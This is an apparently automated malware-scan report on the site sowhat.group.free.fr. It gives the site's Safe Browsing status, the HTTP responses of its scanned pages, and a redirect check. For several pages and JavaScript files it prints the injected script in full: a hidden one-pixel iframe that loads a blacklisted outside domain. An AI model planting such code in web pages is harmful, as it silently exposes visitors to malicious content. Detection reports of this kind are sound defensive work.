Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sowhat.group.free.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sowhat.group.free.fr/ | 200 OK Content-Length: 14536 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 1stpov.com (function () { var bu = document.createElement('iframe'); bu.src = 'http://1stpov.com/count.php'; bu.style.position = 'absolute'; bu.style.border = '0'; bu.style.height = '1px'; bu.style.width = '1px'; bu.style.left = '1px'; bu.style.top = '1px'; if (!document.getElementById('bu')) { document.write('<div id=\'bu\'></div>'); document.getElementById('bu').appendChild(bu); }})(); | ||
http://sowhat.group.free.fr/commun/menu/js/menu_var.js | 200 OK Content-Length: 9109 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 1stpov.com (function () {
var vzqn = document.createElement('iframe');
vzqn.src = 'http://1stpov.com/count.php';
vzqn.style.position = 'absolute';
vzqn.style.border = '0';
vzqn.style.height = '1px';
vzqn.style.width = '1px';
vzqn.style.left = '1px';
vzqn.style.top = '1px';
if (!document.getElementById('vzqn')) {
document.write('<div id=\'vzqn\'></div>');
document.getElementById('vzqn').appendChild(vzqn);
}
})(); | ||
http://sowhat.group.free.fr/commun/menu/js/menu131_com.js | 200 OK Content-Length: 21067 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 1stpov.com (function () {
var vzqn = document.createElement('iframe');
vzqn.src = 'http://1stpov.com/count.php';
vzqn.style.position = 'absolute';
vzqn.style.border = '0';
vzqn.style.height = '1px';
vzqn.style.width = '1px';
vzqn.style.left = '1px';
vzqn.style.top = '1px';
if (!document.getElementById('vzqn')) {
document.write('<div id=\'vzqn\'></div>');
document.getElementById('vzqn').appendChild(vzqn);
}
})(); | ||
http://sowhat.group.free.fr/commun/js/navigation.js | 200 OK Content-Length: 1696 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 1stpov.com (function () {
var vzqn = document.createElement('iframe');
vzqn.src = 'http://1stpov.com/count.php';
vzqn.style.position = 'absolute';
vzqn.style.border = '0';
vzqn.style.height = '1px';
vzqn.style.width = '1px';
vzqn.style.left = '1px';
vzqn.style.top = '1px';
if (!document.getElementById('vzqn')) {
document.write('<div id=\'vzqn\'></div>');
document.getElementById('vzqn').appendChild(vzqn);
}
})(); | ||
http://sowhat.group.free.fr/commun/js/roll-over.js | 200 OK Content-Length: 1605 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 1stpov.com (function () {
var vzqn = document.createElement('iframe');
vzqn.src = 'http://1stpov.com/count.php';
vzqn.style.position = 'absolute';
vzqn.style.border = '0';
vzqn.style.height = '1px';
vzqn.style.width = '1px';
vzqn.style.left = '1px';
vzqn.style.top = '1px';
if (!document.getElementById('vzqn')) {
document.write('<div id=\'vzqn\'></div>');
document.getElementById('vzqn').appendChild(vzqn);
}
})(); | ||
http://sowhat.group.free.fr/./Html/Biographie.htm | 200 OK Content-Length: 16851 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 1stpov.com (function () { var bu = document.createElement('iframe'); bu.src = 'http://1stpov.com/count.php'; bu.style.position = 'absolute'; bu.style.border = '0'; bu.style.height = '1px'; bu.style.width = '1px'; bu.style.left = '1px'; bu.style.top = '1px'; if (!document.getElementById('bu')) { document.write('<div id=\'bu\'></div>'); document.getElementById('bu').appendChild(bu); }})(); | ||
http://sowhat.group.free.fr/./Html/../../index.htm | 400 Bad Request Content-Length: 12303 Content-Type: text/html | clean |
http://sowhat.group.free.fr/test404page.js | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://sowhat.group.free.fr/./Html/../Galerie_video.htm | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://sowhat.group.free.fr/./Html/../Agenda.htm | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://sowhat.group.free.fr/./Html/../Commande.htm | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://sowhat.group.free.fr/./Html/ | 200 OK Content-Length: 14445 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 1stpov.com (function () { var bu = document.createElement('iframe'); bu.src = 'http://1stpov.com/count.php'; bu.style.position = 'absolute'; bu.style.border = '0'; bu.style.height = '1px'; bu.style.width = '1px'; bu.style.left = '1px'; bu.style.top = '1px'; if (!document.getElementById('bu')) { document.write('<div id=\'bu\'></div>'); document.getElementById('bu').appendChild(bu); }})(); | ||
http://sowhat.group.free.fr/./Html/./Html/Biographie.htm | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://sowhat.group.free.fr/./Html/./Html/Galerie_video.htm | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://sowhat.group.free.fr/./Html/./Html/Agenda.htm | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sowhat.group.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 05:53:55 GMT
Accept-Ranges: bytes
ETag: "11c2d3b-38c8-50d57fd0"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 14536
Content-Type: text/html
Last-Modified: Sat, 22 Dec 2012 09:39:28 GMT
...14536 bytes of data.
GET / HTTP/1.1
Host: sowhat.group.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 05:53:55 GMT
Accept-Ranges: bytes
ETag: "11c2d3b-38c8-50d57fd0"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 14536
Content-Type: text/html
Last-Modified: Sat, 22 Dec 2012 09:39:28 GMT
...14536 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sowhat.group.free.fr
Referer: http://www.google.com/search?q=sowhat.group.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sowhat.group.free.fr
Referer: http://www.google.com/search?q=sowhat.group.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.